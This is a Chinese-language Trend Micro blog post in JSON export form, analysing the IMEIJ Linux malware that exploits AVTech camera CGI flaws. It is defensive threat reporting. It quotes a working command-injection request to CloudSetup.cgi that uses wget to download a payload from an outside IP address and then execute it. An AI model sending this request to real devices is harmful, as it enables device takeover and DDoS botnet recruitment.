{"id":48352,"date":"2017-03-16T09:00:18","date_gmt":"2017-03-16T01:00:18","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=48352"},"modified":"2017-03-15T15:10:33","modified_gmt":"2017-03-15T07:10:33","slug":"%e6%94%bb%e6%93%8a-cgi-%e6%bc%8f%e6%b4%9e%e7%9a%84%e6%96%b0-linux-%e6%83%a1%e6%84%8f%e7%a8%8b%e5%bc%8f","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=48352","title":{"rendered":"\u653b\u64ca CGI \u6f0f\u6d1e\u7684\u65b0 Linux \u60e1\u610f\u7a0b\u5f0f"},"content":{"rendered":"

\u00a0<\/h1>\n

\u9577\u4e45\u4ee5\u4f86\uff0cLinux \u4e00\u76f4\u662f\u4f01\u696d\u5e73\u53f0\u8207\u7269\u806f\u7db2\uff08IoT ,Internet of Thing\uff09<\/a>\u88dd\u7f6e\u88fd\u9020\u5546\u6240\u504f\u611b\u7684\u4f5c\u696d\u7cfb\u7d71\u3002\u8a31\u591a\u4e0d\u540c\u7522\u696d\u90fd\u7d1b\u7d1b\u63a1\u7528\u4ee5 Linux \u70ba\u57fa\u790e\u7684\u88dd\u7f6e\u4f86\u5efa\u7f6e\u667a\u6167\u578b\u7cfb\u7d71\uff0c\u4e26\u5229\u7528\u7269\u806f\u7db2 (IoT) \u9598\u9053\u4f86\u5efa\u7acb\u5404\u7a2e\u696d\u52d9\u6240\u9700\u7684\u9023\u7db2\u89e3\u6c7a\u65b9\u6848\u53ca\u670d\u52d9\u3002\u7136\u800c\u96a8\u8457\u9019\u985e\u88dd\u7f6e\u4e0d\u65b7\u666e\u53ca\uff0c\u91dd\u5c0d Linux \u7cfb\u7d71\u7684\u8cc7\u5b89\u5a01\u8105\u4e5f\u8ddf\u8457\u589e\u52a0\u3002\u5148\u524d\u5728 2016 \u5e74\u6211\u5011\u5373\u8a0e\u8ad6\u904e\u4e00\u7cfb\u5217\u7684 Linux \u5a01\u8105<\/a>\uff0c\u5176\u4e2d\u6700\u77e5\u540d\u7684\u83ab\u904e\u65bc Mirai \u60e1\u610f\u7a0b\u5f0f<\/a> (\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba ELF_MIRAI)\u3002<\/p>\n

\u6700\u8fd1\u53c8\u51fa\u73fe\u4e86\u4e00\u500b\u65b0\u7684 Linux ARM \u60e1\u610f\u7a0b\u5f0f\u53eb\u505a IMEIJ (\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba ELF_IMEIJ.A)\u3002\u6b64\u5a01\u8105\u5c08\u9580\u653b\u64ca AVTech (\u965e\u6cf0\u79d1\u6280) \u76e3\u8996\u651d\u5f71\u88dd\u7f6e\u7684\u6f0f\u6d1e\u3002\u6b64\u6f0f\u6d1e\u662f\u7531\u5308\u7259\u5229\u7684\u8cc7\u5b89\u7814\u7a76\u6a5f\u69cb Search-Lab \u6240\u767c\u73fe<\/a>\uff0c\u4e26\u4e14\u5728 2016 \u5e74 10 \u6708\u516c\u958b\u63ed\u9732\u3002\u4e0d\u904e\u5728\u6b64\u4e4b\u524d\uff0cSearch-Lab \u66fe\u591a\u6b21\u8a66\u5716\u806f\u7d61 AVTech \u537b\u672a\u7372\u56de\u61c9\u3002<\/p>\n

\u611f\u67d3\u6d41\u7a0b\u53ca\u985e\u4f3c\u60e1\u610f\u7a0b\u5f0f<\/strong><\/em><\/p>\n

\u6b64\u60e1\u610f\u7a0b\u5f0f\u662f\u7d93\u7531 CGI \u6307\u4ee4\u611f\u67d3\u3002\u9060\u7aef\u99ed\u5ba2\u6703\u96a8\u6a5f\u6311\u9078\u4e00\u500b IP \u4f4d\u5740\u7136\u5f8c\u5411\u8a72\u4f4d\u5740\u767c\u9001\u4ee5\u4e0b\u7db2\u7ad9\u6307\u4ee4\u4f86\u653b\u64ca\u6b64\u6f0f\u6d1e\uff1a<\/p>\n

POST \/cgi-bin\/supervisor\/CloudSetup.cgi?exefile=wget -O \/tmp\/Arm1 https:\/\/192.154.108.2:8080\/Arm1;chmod 0777 \/tmp\/Arm1;\/tmp\/Arm1; HTTP\/1.1<\/p>\n

\u66f4\u7cbe\u78ba\u4e00\u9ede\uff0c\u5b83\u662f\u5229\u7528 AVTech \u88dd\u7f6e\u4e0a\u7684 CloudSetup.cgi \u7a0b\u5f0f\u6f0f\u6d1e\u5c07\u60e1\u610f\u7a0b\u5f0f\u4e0b\u8f09\u5230\u88dd\u7f6e\u4e0a\uff0c\u524d\u8ff0\u7db2\u7ad9\u6307\u4ee4\u6703\u8b93\u88dd\u7f6e\u4e0b\u8f09\u60e1\u610f\u6a94\u6848\uff0c\u4e26\u4e14\u5c07\u6a94\u6848\u8a2d\u5b9a\u6210\u53ef\u57f7\u884c\u6a94\u3002<\/p>\n

<\/p>\n

\u5716 1\uff1aIMEIJ \u7684\u611f\u67d3\u6d41\u7a0b\u3002<\/em><\/p>\n

AVTech \u6709\u8a31\u591a\u9023\u4e0a\u7db2\u969b\u7db2\u8def\u7684\u88dd\u7f6e\u90fd\u53ef\u80fd\u611f\u67d3\u9019\u500b\u65b0\u7684 Linux \u60e1\u610f\u7a0b\u5f0f\uff0c\u5305\u62ec\uff1aIP \u651d\u5f71\u6a5f\u3001\u76e3\u8996\u9304\u5f71\u8a2d\u5099\uff0c\u4ee5\u53ca\u652f\u63f4 AVTech \u96f2\u7aef\u670d\u52d9\u7684\u7db2\u8def\u9304\u5f71\u6a5f\u3002\u4e00\u65e6\u60e1\u610f\u7a0b\u5f0f\u5b89\u88dd\u5230\u88dd\u7f6e\u4e0a\uff0c\u5b83\u5c31\u80fd\u8490\u96c6\u88dd\u7f6e\u7684\u7cfb\u7d71\u8cc7\u8a0a\u548c\u7db2\u8def\u6d3b\u52d5\u8cc7\u6599\u3002\u6b64\u5916\uff0c\u5b83\u9084\u53ef\u57f7\u884c\u9060\u7aef\u99ed\u5ba2\u6240\u4e0b\u7684\u6307\u4ee4\uff0c\u767c\u52d5\u5206\u6563\u5f0f\u963b\u65b7\u670d\u52d9\u653b\u64ca (DDoS)<\/a>\u653b\u64ca\uff0c\u7136\u5f8c\u81ea\u884c\u505c\u6b62\u3002\u53d7\u611f\u67d3\u7684\u88dd\u7f6e\u9084\u53ef\u80fd\u8b93\u540c\u4e00\u7db2\u8def\u4e0a\u7684\u5176\u4ed6\u88dd\u7f6e\u9677\u5165\u5371\u96aa\u3002<\/p>\n

IMEIJ \u6709\u4e09\u500b\u4e0b\u8f09\u7db2\u5740\uff0c\u5206\u5225\u4f4d\u65bc\u5169\u5bb6\u4e0d\u540c\u7684 ISP\uff1a<\/p>\n